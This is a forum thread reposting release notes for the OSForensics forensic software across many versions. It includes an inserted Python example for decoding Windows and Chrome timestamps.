DVB-Cube <<< The German PC and DVB Forum >>>

PC Corner => # Security Center => Software (PC Security) => Thread started by: SiLæncer on 05 October 2012, 06:00

Title: Forensic software, miscellaneous
Post by: SiLæncer on 05 October 2012, 06:00
(http://images.six.betanews.com/screenshots/scaled/1305646367-1.jpg)
OSForensics will allow you to extract forensic data from computers more quickly and easily than ever. Uncover everything hidden inside a PC. Discover relevant forensic data faster with high performance file searches and indexing. Restore deleted files. Identify suspicious files and activity with hash matching, drive signature comparisons, and look into e-mails, memory, and binary data. Manage your digital investigation. Organize information and create reports about collected forensic data.

Freeware

Latest Changes

- Fixed indexing for drive root

http://www.osforensics.com/
Title: OSForensics 2.0.1000
Post by: SiLæncer on 31 January 2013, 20:00
Latest Changes

- Support for multiple drives & folders when indexing. So a single index can now span more than one drive
- Support for templates in the file indexing module. (to save re-entering data each time an index is created)
- Ability to capture pages from web sites and add them to a case (not finished in this Alpha release)
- Add support for searching multiple set of index files in a single search
- Added much improved E-mail viewer / browser
- Will open automatically if viewing an E-mail archive
- Can now add Email attachments to case
- Added the option to copy files from a case to the output directory when creating a case report (instead of just including a reference to the files)
- Changes to the Internal File Viewer
- Window can now be maximized. Minimum window size limits removed
- Minor metadata fixes
- Can now add string list to case in Hex Viewer
- Exported string list now contains string extraction settings
- Can now carve to file (and add to case) in Hex Viewer
- Can now directly open Office documents without the need for an external tool to extract the text. Should be significantly faster to open large documents in images
- The index search function is now built into OSF (so it is no longer an external .exe). This allows better persistent caching of the index which in some cases leads to much faster searches e.g. 500% faster, for large sets of index files and search te
- Carved file can now be added to case in the raw disk viewer
- Implemented functions for reading the $I30 info file for NTFS directories. I30 data now shown in Hex View tab for NTFS directories
- WebBrowser, Added ability to add/save complete webpage to case as MHTML (.mht) file and image file. Can select region of screen to save or full screen. Free version of software will contain watermark, Pro version won't
- Changes to the raw disk viewer
- Added right-click menu to search results in raw disk viewer. In particular, users can now export the search results to disk
- 'Select Range' dialog now populates 'Start offset' with current offset
- 'Select Range' dialog shows the number of bytes between the start and end offset
- Changed UI layout to tab-based of memory viewer module. Re-organized buttons
- Bug fix when accessing zip file content on a FAT16 volume using direct image access
- Fixed bug where FAT clusters were incorrectly flagged as deleted
- Several speed improvements on FAT volumes when using direct image access
- Bug fix for assert errors at startup on machines with large amounts of RAM (> 32GB)
- Fixed pre-scan file counting bug relating to upper and lower case files names in the indexing module
- The last folder used for a report is now stored to avoid the need to re-enter it
- Fixed a crash on exit caused by the memviewer freeing resources that it shouldn't be freeing
- Fixed a bug that prevented case reports being generated on any drive other than the one the case resided on
- Made some changes to the Opera browser recent activity functions to prevent a possible crash
- Added toolbar for quick access to changing views in file system browser
- Fixed file name issues when exporting HFS+ files to an NTFS drive where the file name on the Mac system used characters that are illegal characters on a NTFS system
- Changed behaviour when adding emails from a search to overwrite existing ones (previously would create a second copy with a number appended to the name)
- Change behaviour so that when an email overwrites one that already exists the list view item of the old item is updated with the new title
- Added right-click function for directories in file system viewer to switch to 'Create Signature' module and automatically fill in location
- Better handling of nested e-mail/attachments in the index search function
- New indexer with fixes for index search results showing corrupted URLs for email attachments & also fixed binary string extraction skipping longer phrases
- Fixed bug in Mbox Email Reader with attachments missing characters in the filename
- Fixed progress bar for adding email and attachment to the case
- Fixed Email path issues in the file signature function
- DOS batch (.bat) files can now be run from the system information function
- Corrected an issue where the "Live system Capable" radio buttons were not checked when editing a command in the system information function
- Allow right-click Copy/Copy All in the system information results tab
- Fixed buffer overflow caused by long header fields (eg. 'To:')
- More information about the index is displayed under the results window
- Changed default number of maximum search results to 1000 from 5000
- Added logging and error conditions for searching an index
- Fixed a bug preventing FireFox recent activity history from being read when directly accessing an image file
- Fixed a bug where the location of IE & Safari recent activity entries could show uninitialised character values when directly accessing an image file
- Fixed a bug in the search index function when opening a word list that contains extended ASCII characters
- Fixed bug in search index history list view when a past search query contains spaces
- Bulk searches performed via 'Browse Index' tab can now be cancelled by the user before they have completed
- Added message box after successfully carving to file in the raw disk viewer
- Fixed a bug with Chrome timestamps not being converted correctly in recent activity and new Chrome releases
- Fixed a typo in recent activity drop down (Form History)
- Fixed incorrect display of Cyrillic characters in some recent activity output (Chrome and Firefox)

http://www.osforensics.com/
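The Chrome timestamp fix in the post above is a recurring source of error in timeline work: Chrome stores most of its times as microseconds since 1601-01-01 (the WebKit epoch), NTFS and the registry use 100-nanosecond FILETIME ticks counted from that same epoch, and many SQLite artefacts use Unix seconds. Mixing the three up silently shifts events by centuries or truncates them to 1601. The following is an added example, not code from the post or from OSForensics; every input value in it is constructed for illustration, not taken from a real artefact.

```python
"""
Decoding the 1601-based timestamps found in Windows and Chrome artefacts.

Added example; not code from the original post or from OSForensics.
Three encodings are handled, all interpreted as UTC:
  FILETIME  100-nanosecond ticks since 1601-01-01  (NTFS, registry, OLE)
  WebKit    microseconds since 1601-01-01          (Chrome History/Cookies)
  Unix      seconds since 1970-01-01               (many SQLite artefacts)
"""
from datetime import datetime, timedelta, timezone

EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
EPOCH_1970 = datetime(1970, 1, 1, tzinfo=timezone.utc)
# 134774 days lie between the two epochs; every 1601-based conversion hinges on this constant.
SECONDS_1601_TO_1970 = 11_644_473_600


def filetime_to_datetime(ticks):
    """FILETIME -> aware datetime. 0 (1601-01-01 00:00) is the 'unset' sentinel and yields None."""
    if ticks < 0:
        raise ValueError("FILETIME is unsigned")
    if ticks == 0:
        return None
    # FILETIME has 100 ns resolution; datetime stops at microseconds, so drop the last digit.
    return EPOCH_1601 + timedelta(microseconds=ticks // 10)


def webkit_to_datetime(micros):
    """Chrome/WebKit timestamp (microseconds since 1601) -> aware datetime; 0 -> None."""
    if micros < 0:
        raise ValueError("WebKit timestamps are unsigned")
    if micros == 0:
        return None
    return EPOCH_1601 + timedelta(microseconds=micros)


def unix_to_datetime(seconds):
    """Unix seconds (int or float) -> aware datetime."""
    return EPOCH_1970 + timedelta(seconds=seconds)


def to_unix_seconds(value, kind):
    """Normalise any of the three encodings to Unix seconds (float), e.g. for sorting a timeline."""
    if kind == "filetime":
        return value / 10_000_000 - SECONDS_1601_TO_1970
    if kind == "webkit":
        return value / 1_000_000 - SECONDS_1601_TO_1970
    if kind == "unix":
        return float(value)
    raise ValueError(f"unknown timestamp kind {kind!r}")


def guess_kind(value):
    """
    Magnitude heuristic for dates between 2001 and 2038:
      Unix seconds  ~ 1e9  .. 2e9     (10 digits)
      WebKit micros ~ 1.26e16 .. 1.36e16 (17 digits)
      FILETIME      ~ 1.26e17 .. 1.37e17 (18 digits)
    A hint only: Unix milliseconds (13 digits) would fall into the gap, so confirm
    the guess against a known-good record before relying on it.
    """
    if value < 10**11:
        return "unix"
    if value < 10**17:
        return "webkit"
    return "filetime"


def decode(value):
    """Guess the encoding and decode it; returns (kind, datetime-or-None)."""
    kind = guess_kind(value)
    if kind == "filetime":
        return kind, filetime_to_datetime(value)
    if kind == "webkit":
        return kind, webkit_to_datetime(value)
    return kind, unix_to_datetime(value)


if __name__ == "__main__":
    # Constructed sample values, not taken from a real artefact.
    for raw in (116444736000000000, 11644473600000000, 13000000000000000, 1355526400):
        kind, when = decode(raw)
        print(f"{raw:>20} {kind:<9} {when}")
```

The two 1970 values (FILETIME 116444736000000000 and WebKit 11644473600000000) are the usual sanity check: both must decode to the Unix epoch exactly, otherwise the conversion constant or the scale factor is wrong.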
Title: OSForensics 2.0.1001
Post by: SiLæncer on 05 February 2013, 06:00
Latest Changes

- Added Web Snapshots category to case management for exports from the web browser module
- Added additional URL meta data to Web Snapshots (viewable from case item properties window)
- Fixed index search bug causing variant words like "testing" instead of "test" to not be found
- Fixed index search bug causing exact phrases using quote characters to not return any search results

http://www.osforensics.com/
Title: OSForensics 2.0.1002
Post by: SiLæncer on 11 March 2013, 22:00
v2.0.1002 - 11th of March 2013

    Fixed error when attempting to select a file in the listview with no items.
    $I30 directory entries now returned even if the MFT record does not contain a $FILE_NAME attribute.
    Fixed a bug in the report template where Web Snapshots, Notes, Emails and Bookmark tables were not being sorted when their heading columns were clicked.
    Fixed a crash when changing hex view settings.
    Changes to Forensic File Copy to better handle conflicts with 8.3 names on NTFS.
    Fixed a bug in the recent activity scan on non-live systems where USB devices were not displaying a last connected time and date.
    Fixed a bug where the scroll bar was not updating on the recent activity page when using the mousewheel.
    In File Info tab, added 'Short file name' field for NTFS/FAT 8.3 short filenames.
    Fixed a bug that was preventing the recent activity module from getting windows system event information for the live system.
    Added filename and file extension sorting to index search.
    Fixed a crash when viewing/exporting a download recent activity record.
    Added right-click option to save file to disk for the filepath hyperlink in the Decode Window.
    Added progress bar when saving file to disk, allowing the user to cancel if taking too long.
    Fixed a crash that could occur when scrolling on the recent activity tab.
    Fixed a bug where in the recent activity items the Chrome form history items could be saved with the currently registered username for OSF and not the local user.
    Fixed a bug in the recent activity CSV save to case / export where the time offset was saved in the location field for MRU items.

http://www.osforensics.com/
Title: OSForensics 2.0.1003
Post by: SiLæncer on 22 March 2013, 22:00
v2.0.1003 - 22nd of March 2013

    Forensic Copy
        Fixed Forensic File Copy not copying folder 8.3 short names.
        Made change to handle setting 8.3 short file names on files that have a read-only flag.
    Added fractions of seconds to internal viewer file properties output.
    Recent Activity - Now also searches registry location for typed IE URLs.
    System information
        Changed the dialog title to reflect that a command is being edited rather than a new command.
        Fixed a bug where if the first entry in the list was editable then it wasn't loading correctly and defaulting to the new command dialog.
        Fixed a bug where if the list management dialog was closed using the X button rather than OK the current command window display was not being updated to reflect any changes.
        Added new system information functions (Get User Info, Get Timezone, Get computer name, Get network info) that can query the registry for information, these functions can be used on the local system as well as disk images and other system drives.
    Navigation Bar - Added 'Registry Viewer' button.
    Start Page - Dialog for selecting registry file now closes when the Registry Viewer is opened.
    Registry Viewer
        Correct icon is now displayed for Find/Goto windows.
        All search types now selected by default in Find window.
        and keys now work properly for Find/Goto windows.
        Cancel button now works properly for Find/Goto windows.
        Find/Goto windows stay open after search.
        Added splitter bar and fixed resizing issues.
        Added shortcut keys for searching (Ctrl+F, F3, Ctrl+G).
        Find/Find next now traverses the tree in order according to currently selected entry.
        Added support for opening multiple registry files in one viewer
        Added icons for tree view
    Email Viewer
        Fixed bug with retrieving the HTML body using the MVCOM library. Should use _bstr_t instead of BSTR
        Changed header fields to Edit controls to fix redraw issues when resizing
        Improved parsing of Date/Time strings.
    Hex View
        Added Ctrl+C (copy hex) and Ctrl+A (select all) keyboard shortcuts
        Fixed crash carving data.
        Changed string extraction so that it no longer separates URL strings into components (eg. 'http', 'www'), as this was preventing the URL filter from being useful.
    Password Recovery
        Changed behaviour when recovering Firefox passwords so that if a Firefox install isn't found on the drive being scanned OSForensics will also check for a Firefox install on the system drive.
        If a FireFox location is not found an error message is now displayed.
        Added warning to password recovery and system information functions when running on a live system and the permissions of the SAM registry files need to be changed

http://www.osforensics.com/
Title: OSForensics 2.1.1000
Post by: SiLæncer on 10 August 2013, 08:00
Release Notes:

v2.1.1000 - 9th of August 2013

    Indexing changes:
        Will now process e-mail headers
        Added .zipx extension in filetypes to be recognized, handled as "Binary (filename only)"
        Added handling of ZIPX as "Binary (filename only)"
        Added checkbox to scan attachments in e-mails to advanced template configuration window
    Added Volume Shadow Copies support to the File System Browser. Currently considers a file to be a shadow if the modified time of the file is different from the current volume file. Steps to use this feature are:
        Add Disk Image OR Drive in forensics mode OR Disk to case
        Add subsequent Volume Shadows for just added device.
        Load File system browser and enable Show shadows under options menu.
        Browse (the shadow copy files text/label will be a shade of grey).
    Added "Add All" Volume Shadow Copies option to Add Device dialog window.
    Added "loading" dialog box when parsing shadow copies.
    Shadow copies can now only be loaded for devices that are already added to case.
    Improved performance when using shadow copies as a result of caching data in RAM. This should also allow larger drives to be examined in a reasonable amount of time.
    Added button to FSB Toolbar that launches a module to perform volume "diffs" for shadow copies, it behaves similarly to the Create/Compare signature function.
    Added keyboard shortcuts to Internal file and email viewers.
    Raw disk viewer searches are no longer aborted when the search window is hidden.
    Made some change to the Chrome download section in recent activity to work with newer chrome versions (26.0.1410.64) as the database structure has changed.
    Can now select 'Use entire image file' when selecting a partition from an image file.
    Added Loading progress indicator for the advanced EmailViewer
    When an error occurs when adding multiple items to case, added a Message Box to prompt if user wants to continue (or quit). This avoids a situation where hundreds of error boxes might otherwise be displayed in a loop.
    Raw disk viewer decode window can now identify a dynamic volume as "Windows dynamic volume (LDM)"
    Can now detect dynamic volumes in dynamic disks (LDM)
    In the 'Drive imaging' module, added 'Rebuild RAID' tab for rebuilding a single RAID image from multiple source disk images. Support for auto-detecting Intel Matrix RAID (IMSM) & software RAID was included. Additional auto-detecting features for other RAID formats are expected to be supported in future releases. Added support for manually changing image file offset/size for RAID rebuilding.
    Rebuilding RAID images for the following RAID metadata types
        SNIA DDFv1
        Highpoint v2 RocketRAID
        Highpoint v3 RocketRAID
        Adaptec HostRAID
        Integrated Technology Express RAID
        JMicron RAID
        LSILogic V2 MegaRAID
        LSILogic V3 MegaRAID
        nVidia MediaShield
        Promise FastTrak
        Silicon Image Medley RAID
        Silicon Integrated Systems RAID
        VIA Tech V-RAID
        (Note that not all permutations have been tested)
    Added RAID 0+1, RAID1+0, RAID 3, SPANNED rebuilding support
    RAID "Info" dialog now shows the metadata for all matching RAID formats
    Can select between multiple RAID metadata types if multiple formats detected
    Added HPA/DCO imaging. This allows hidden area on the disk to be made accessible for copying. HPA = Host protected area. DCO = Device configuration overlay. Note that on some drives there is locking that will prevent changing the HPA/DCO disk extent limits.
    Carved files will now have FILETIME set to Jan 1, 1601 12:00 PM when the real date information is not recoverable.
    File Carving percent complete display bug fix.
    File Carving put more safety checks when carving Zip / OfficeXML files to prevent crash.
    Thumbnail Viewer, fixed a problem with thumbnails without a visible size being drawn as black box
    Fixed some potential memory allocation issues in the internal file viewer when viewing buffers. (Which is how deleted files are viewed).
    Fixed a crash that could occur in recent activity during the IE URL scan, some URL paths were longer than expected
    Added 'Info' button to retrieve and display the RAID metadata from an image file in the Disk Imaging module.
    Added ability to open Internet Explorer IE10 history databases and retrieve visited URLs (Vista and newer only). IE10 has a new internal format for storing this data compared to previous releases.
    Updated document indexer to handle indexing recursive PST files (PST and MSG files attached to E-mails inside PST files).
    Fixed issue where "Add to Case" menu item was enabled when a case is not yet opened.
    Fixed some memory leaks when indexing emails and attachments.
    Fixed Email Viewer appearing (with no error messages and no emails) when PST file cannot be opened (e.g. because Outlook is open and holding access). It now shows an error message and destroys the Email Viewer window before it displays.
    Fixed EmailViewer appearing (with truncated email contents) when user hits "Cancel" during PST loading
    Fixed the EMail viewer's handling of embedded emails (.msg files attached to a .msg file) in the EmailViewer.
    Made some changes to stop a reported crash in the registry viewer.
    Fixed a bug with the Windows Login Password when using "Live acquisition of current machine", a required registry permission was failing to be set correctly
    Old/simple PSTViewer is now restored in project and used when PST file is > 10GB
    Changes to try and stop the recent activity/registry viewing crashing in invalid data circumstances (caused by null records in the registry).
    Added help context for Volume Shadow Copies.
    Help file updates for HPA / DCO hidden areas in Disk Imaging and 'RAID Rebuild' functionality.

http://www.osforensics.com/
Title: OSForensics 2.2.1000
Post by: SiLæncer on 10 September 2013, 22:00
What's new:

· Added support for creating a self booting USB solution from the "Install to USB" section, this is a new tool called "WinPE builder" that can be launched after the "Install to USB" process.

http://www.osforensics.com/
Title: OSForensics 2.3 Build 1 Beta
Post by: SiLæncer on 05 November 2013, 14:30
What's new:

Increased copy to clipboard limit from 100 to 10,000 files

Password Recovery:

Added "a-z A-Z 0-9" Alphanumeric option to password recovery random character options
Added scanning of windows credential manager for browser passwords as part of the recent activity function.
Updated the Firefox password recovery feature to work with the latest version of Firefox (24)
Fixed a bug where if there was only one password entry stored in the Firefox database it was not displayed

File System Browser:

Added extra metadata column for the LCN of the first cluster of the file. This is useful for seeing if files are grouped together on the disk.

Drive Preparation:

The Write pattern function could incorrectly report a write error near the very end of the drive for some USB flash drives, this has been corrected.
Changed the error message when adding an image file to a case to include the image name.
Updated "Print" features for EmailViewer and PstViewer
Fixed a bug with HTML email printing not having any header
Fixed a bug with not printing full headers, RTF, and plain text mail

http://www.osforensics.com/
Title: OSForensics 3.0.1000
Post by: SiLæncer on 16 July 2014, 22:00
Release Notes

New Modules:

    ThumbCache viewer for viewing cached thumbnails stored in the Windows thumbnail cache database (Windows Vista and later only)
    ESE database viewer for viewing the records stored in ESE database files (.edb). ESE database format is used by a variety of Microsoft applications and can often contain data of forensics value.
    Prefetch Viewer for viewing the application prefetch data stored by the operating system's prefetcher. This data includes when the application was last run and how frequently it has been run.

Case Management

    Added option to "Make case default" when adding a device to a case so it is selected by default for future actions
    When deleting cases, added prompt to allow the case files to be saved to another location before deleting
    Adding attachments from case devices now supported
    Multiple image partitions can now be mounted at the same time
    VHD image files can now be mounted
    Added 'Repeat action' checkbox to message box when adding a file already existing in case
    Fixed a bug that was preventing undeleted files from being exported as part of a report
    Fixed bug with selecting default drive when creating case. Also removed current case's devices from default drive dropdown list.
    Fixed issue with setting newly mounted drives as default drive
    Fixed bug with condensing white space when reading .OSFCfg files
    When adding shadow drives, fixed combo box not being reset when changing drive selection
    Changed the error message when adding an image file to a case to include the image name.
    Fixed a bug preventing bookmark tables in reports from being sorted

Deleted Files Search

    Searching for deleted files in HFS+ drives now supported
    Results can now be displayed in 'thumbnail' and 'timeline' view
    Timeline view now shows stacked bars grouped by file extension
    Fixed overall system slowdown caused by large blocking file reads when file carving
    Removed right click menu options that aren't supported by the file system
    Fixed a crash when pressing a key with nothing selected
    Fixed deleted directory icon not being displayed for non-NTFS file systems
    Fixed deleted file fragmentation info not displaying for NTFS case devices
    Fixed crash with invalid memory access when searching for ext2 deleted files

File System Browser

    Added extra metadata column for the LCN of the first cluster of the file. This is useful for seeing if files are grouped together on the disk.
    Deleted files/directories can now be displayed (in red text). Added menu option to enable deleted files to be displayed.
    Added right-click menu option to attach selected files to case
    Attribute modify date is now displayed for ext2 file systems
    Fixed deleted icon overlay so that it displays correctly on XP

File Indexing

    Indexer updated to the new Zoom Engine, which includes support for real-time logging
    Indexing now supported for Shadow Volumes
    Timeline view now shows stacked bars grouped by file type
    Multiple history items can now be added to case
    Multiple history items can now be deleted
    Changed indexing/searching limit to 25000 items for Free version
    Optimized index search by not reloading dictionary for every search
    Fixed a crash when indexing multiple partitions mounted from image files
    Fixed potential Thumbnail view crash due to lists being deleted while thumbnails are loading
    Fixed bug with DBX message count not being included in total e-mail count
    Fixed Custom Limits not being saved/applied in Edit Template.
    Fixed 'default' button not deselecting non-default filters in log window
    Fixed unallocated cluster indexing not working for drives mounted in Standard mode
    Fixed timeline date filter not filtering items correctly
    Fixed regex filter combo box in 'Browse Index' tab showing invalid characters
    Fixed invalid characters showing up in 'History' under the 'Settings' column

File Name Search

    Timeline view now shows stacked bars grouped by file extension
    Deleted files/directories can now be displayed (in red text). Added menu option to enable deleted files to be displayed.
    Attribute modify date now displayed for ext2/hfs file systems
    Fixed a memory leak when closing window

Hash set lookup

    Added list of matched files when performing hash set lookup of more than one item. The list view contains a list of files that are found in the hash set. Previously, only the number of matches was displayed without any information on the files that matched.
    Added support for deleted files hash lookup

Internal Viewer

    Metadata viewer tab now displays $I30 entries (normal + deleted) for NTFS directories
    Metadata View tab now displays EXIFTool metadata for deleted files
    Metadata View tab now displays carved $I30 records for deleted directories
    Added jump to index right-click menu option
    Deleted files opened from the file system browser can now be viewed
    Thumbnail cache data opened from the ThumbCache viewer can now be viewed
    File Info tab now shows the file's starting LCN
    Increased the default number of strings limit in Hex view tab to 50,000. Increased the max number of strings limit to 1,000,000
    Improved loading and caching of files
    Reduced file loading time by optimizing file system accesses
    Ctrl-C (copy)/Ctrl-A (select all) keyboard shortcuts now work in Text View
    Fixed minor issue in File Info tab with short filenames appearing incorrectly
    Fixed bug with hex viewer string extraction not stopping when max # results reached
    Fixed viewer string extraction omitting words in results
    Fixed 'Copy ASCII' in Hex view tab to copy all characters other than '\0' to clipboard
    Fixed icon transparency not displaying correctly in Windows 8
    Fixed metadata view tab showing icons when displaying EXIF metadata
    'Unsupported file type' text is now displayed when failing to convert document files to text
    Fixed crash due to buffer overflow bug with handling Excel document conversions

Email Viewer

    Added support for searching message body
    Added support for date filtering
    Updated "Print" functionality
    Fixed a bug with HTML email printing not having any headers
    Fixed a bug with not printing full headers, RTF, and plain text mail

Recent Activity

    Added scanning of Windows search database (Windows.edb) index records
    Added scanning of prefetch items
    Added scanning of windows credential manager for browser passwords
    Added 'Config' window for configuring scan options (date range, items to scan)
    Added additional filter for MRU sub-categories when filtering by 'MRU'
    Timeline view now shows the breakdown of activity types via stacked bar graph
    Changed behaviour when using the right click "Export to" options in the timeline so only the items from the active timeline section are included (previously all the found items were exported)
    Timeline view is now synchronized with File List view
    Removed 'Summary' button. Summary dialog now appears when clicking the 'Total Items' hyperlink
    Fixed crash when pressing 'Enter' with nothing selected
    Fixed item selection when 'End' is pressed
    Fixed stack overflow bug
    Fixed error when opening the selected item with the registry viewer
    For Chrome downloads, results now show filename from source URL if destination download path unavailable
    Fixed scanning of IE history not working for certain versions of IE
    Fixed a bug preventing the name of items from being output correctly for CSV export

Mismatch search

    Added text colour to "Identified Type:" field for emphasis
    Fixed a bug that was causing a crash when adding a file to a case

SQLite Browser

    Files saved in temp folder are removed when exiting
    Fixed uninitialized pointer bug when exiting program

Password Recovery

    Added "a-z A-Z 0-9" Alphanumeric option to password recovery random character options
    Updated the Firefox password recovery feature to work with the latest version of Firefox (24)
    Fixed a bug where the password was not displayed if there was only one password entry stored in the Firefox database
    Updated error message to show correct error code when permissions prevented some registry changes
    Fixed crash when adding .rti rainbow tables without valid file segments
    Under 'Generate Rainbow Table' tab, moved the character set definition in the combo box to an edit control due to length
    Under 'Generate Rainbow Table' tab, changed character set combo box to non-editable

Drive Preparation

    Fixed Write pattern function incorrectly reporting a write error near the very end of the drive for some USB flash drives

Drive Imaging

    Restoring VHD image files now supported
    Disk image name and type is now maintained when using the browse button (if already entered)
    Fixed bug with imaging drives as Encase files

Install to USB

    Added window message processing during the USB installation process so the application doesn't display as "Not responding"
    Disabled Install/Exit/Browse buttons when install process starts
    Stopped "Install to USB" function from working when not installing to a USB/removable drive

Web Browser

    No longer creates a web browser temporary dir as it was not being used and was not being cleaned up properly after program exit.

Misc

    Deleted files are now supported in thumbnail view
    Various performance improvements when loading thumbnails in thumbnail view
    Fixed display of files without high resolution icons in thumbnail view. Previously this meant a tiny icon was drawn
    Deleted file thumbnails now show the proper icon/thumbnail with a deleted overlay flag in thumbnail view
    Fixed crash caused by bug with retrieving the file icon in thumbnail view
    Fixed crash caused by overflow of the label exceeding 260 characters in thumbnail view
    Added support for stacked bar graphs via groups in timeline view
    Fixed bug when the data spans greater than 30 years in timeline view
    Increased copy to clipboard limit from 100 to 10,000 files
    Fixed a crash when handling compressed files on NTFS for cluster sizes <4KB
    Redirected stdout containing Unicode characters should now work correctly (eg from System information tools)
    Fixed some flickering when adding files to case
    Updated OSFMount to v1.5.1015
    Fixed several crashes that could occur when closing OSF
    Fixed crash when attempting to shadow copy files from a drive mounted in standard mode
    Non-raw image files that cannot be opened properly will be opened as raw
    Reduced flickering when resizing window
    Fixed copying of shadow copies of locked files into temporary directory


http://www.osforensics.com/
Title: OSForensics 3.0.1001
Post by: SiLæncer on 20 August 2014, 12:17
Release Notes
v3.0.1001 - 19th of Aug 2014

    Case Management
        Images/drives without valid partition/file system info (ie. boot sector) can now be added to the case. This allows the drive to be viewable using the Raw Disk Viewer.
    File Indexing
        Added support for indexing extracted binary text from "hiberfil.sys" and "pagefile.sys" (not limited by max file size limit)
        Fixed stemming problems during indexing
        Fixed bug with updating indexing status causing small indexing jobs to report no files being indexed
        Fixed bugs with identifying misnamed ZIP files during indexing
        Updated Engine/CGIs to V7 build 1008
        Image search results that are nested in archives are now displayed in the 'Images' tab
        Image search results that are nested in archives are now displayed with an 'archive' overlay on the top left corner of the icon
        Fixed bugs with accented characters in search result URLs
        Fixed bug with opening search results in the Internal Viewer
    Deleted Files Search
        Fixed bug in file carving of .mov files (was including 4 additional bytes in the end, now removed)
        Fixed file carving of .pdf files. Will now check buffer for four known combinations of end markers. If not found, will default to looking for %EOF.
        Fixed scanning of deleted files on mounted drives without partition information
    Raw Disk Viewer
        Fixed divide-by-zero error when performing a raw disk search on a disk with sector size = 0
        Fixed partition info in the Decode window not being updated correctly when a new disk is loaded
    Web Browser
        Module will now load on first use instead of loading on startup. Starting page is now set to about:blank (was set to http://www.osforensics.com ). This minimises the impact on a live target system when running OSF from a USB drive.
    Internal Viewer
        Fixed image stored in the alternate stream of a file not being displayed
    Misc
        Fixed bug with FAT file system parsing caused by truncating errors when calculating cluster offset. This could prevent some FAT partitions from being mounted when the FAT partition's starting offset was a long way from the start of the disk.
        Added debug statements to FAT file system parsing (when DEBUGMODE mode is enabled)
        Added debug statements when there are NTFS file system parsing errors in applying fixup values to MFT and index records (when DEBUGMODE mode is enabled)
        Updated WinPEBuilder.exe to include more debug messages.

http://www.osforensics.com/
Titel: OSForensics 3.1 Build 1000
Beitrag von: SiLæncer am 19 November, 2014, 13:30
Release Notes

Email Viewer:

Only one instance of the e-mail viewer window is now available and shared amongst all modules. This allows e-mail messages to be opened instantly without having to reload the e-mail file if it was previously opened.
Partially loaded e-mail files (ie. cancelled halfway during loading) are no longer allowed and removed from the tree view
Added support for recovering deleted and orphaned e-mails in PST files
Added status bar on the bottom of the window to indicate the number of items in the current folder
Fixed header field (From, To, Cc) text not showing when text length is too long
Fixed saving attachments with invalid filename characters
Added implementation to save PST emails with embedded message attachments in MSG format.
Removed storage of e-mail file path for each mail item to reduce memory usage
Fixed a crash when closing e-mail viewer while still loading e-mail/searching

Direct Access:

Reduced the memory usage for VMDK, VHDI and raw images
Cache data is now shared globally per device rather than per device/thread. This reduces memory usage and increases performance

NTFS:

Fixed loading of $MFT file split into multiple MFT records
Added caching of ATTRIBUTE_LIST to improve performance
Fixed a possible crash when saving to disk

Internal viewer:

Fixed a crash related to merged cells when converting excel document to html
Fixed a bug with POLE library causing large files to be saved improperly
Fixed hex view showing incorrect bytes while performing search

Forensic Copy:

Fixed error message preventing files from being copied to a Windows drive destination

File Indexing:

Added support for indexing .tar, .gz, .tar.gz, etc.
Added BinStringsUseBigram option for create index binary string extraction settings, Code words and Extreme
Added options to index "System hibernation and paging files"
Changed email prescan estimate to handle more cases
Added a MAXPAGES min. cap of 100,000 pages when scanning attachments
Fixed a bug with not detecting if wordmap merging failed mid write due to out of space or other causes.
Fixed a bug with free edition not indexing PDF files properly (indexed as html)
Fixed a bug with not being able to perform searches on indexes created within a folder path that contains Unicode characters (e.g. Unicode characters in user name or in case name)
Fixed an issue with not scanning text files (non plugin files) when scan .sys files is enabled.
Fixed a bug with an infinite loop when indexing a file misnamed as DOC (e.g. a RTF file)
Fixed several bugs when indexing emails

Recent Activity:

New user interface, summary of items shown in left hand treeview side, added filters, new sortable list
Updated to work with latest version of opera (23)
Now searching localised folder names so should return more results on non-English installs of Windows
Now searching more registry locations for installed programs so far more results should be returned
Fixed a bug where registry locations of some installed programs weren’t displayed fully
Fixed some issues when trying to get recent activity from non-system drives

Drive Preparation:

Improvements to Disk preparation error messages.
Improvement to the Drive preparation progress update.

Disk Imaging:

Raid rebuilding, fixed detection of RAID metadata for Promise RAID controllers

http://www.osforensics.com/
Titel: OSForensics 3.1.1001
Beitrag von: SiLæncer am 16 Dezember, 2014, 13:00
Release Notes

Case Management

Fixed potential deadlock after clicking 'Cancel' when items are being added to the case
Fixed 'To' field missing in e-mail case properties
Fixed 'From', 'To', 'Subject' fields missing in case report
Removed check for empty e-mail headers (From, To, Subject, etc...) when adding e-mail to case. Adding warning to log file instead.

Email Viewer

When exporting e-mails to file/case, 'Print-friendly' HTML file is now generated. Currently, only HTML/text is supported.

File Indexing

Indexer updated to the latest Zoom Engine
Fixed a bug when indexing email attachments with accent characters in the folder path
Fixed infinite loop bug when indexing corrupted ZIP files
Fixed a crash bug with indexing MSI files (and any other files that can be misidentified as DOC)
Added error message when handling bad ZIP files.
Added default handling of .msi files as binary (filename only) format.

Recent Activity

Will now return files/folder from user's Recent Item folder (shell folder)
Added Support for Word 2013 Reading Locations to Recent File List Item
Added Support for Office 2013 (Word, PowerPoint, Excel) Recent File List
Added Adobe Acrobat Reader MRU locations
Now also parsing the subkeys of Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.xxx, where .xxx is the file extension, to retrieve more information
Added Right Click Menu Option - Copy Row to Clipboard
GUI Fixes, Help File Link Update
Added Filter for text search of all fields for an activity type
Installed Programs, if there is no program name, will return registry location as the title.

Registry Viewer

When opening key paths containing SYSTEM\CurrentControlSet, which is a volatile symbolic link, it is replaced with 'ControlSet00n', where n is the current control set

Search Index

Improved performance of adding PST e-mail/attachments to case by using the same e-mail file handle, instead of opening and closing for every e-mail message

http://www.osforensics.com/
Titel: OSForensics 3.1.1004
Beitrag von: SiLæncer am 16 Januar, 2015, 12:24
Changelog
V3.1.1004 - 16th of Jan 2015

    Email Viewer
        Added handling of RFC 2047 encoding in subject/address fields of MIME headers
        Fixed buffer overflow in status message while recovering deleted e-mails in PST files
        Fixed 'S' shortcut key being processed instead of 'Ctrl+S' to add attachments to case
        Fixed a bug with saving embedded message in PST/OST files as .msg. LIBPFF_ENTRY_TYPE_ATTACHMENT_DATA_OBJECT property was being saved as a stream instead of storage
    ESEDB Viewer
        Fixed population of known ESEDB files to use localised folder names instead of hard-coded locations
    File Indexing
        Pre-scanning can now be cancelled while scanning PST messages
        Updated Zoom indexer to fix some crash issues
        Updated Zoom Office XML plugin
        Improved length limit for meta fields in email files (used for FROM/TO/CC/BCC) from 255 characters to 65,535 characters.
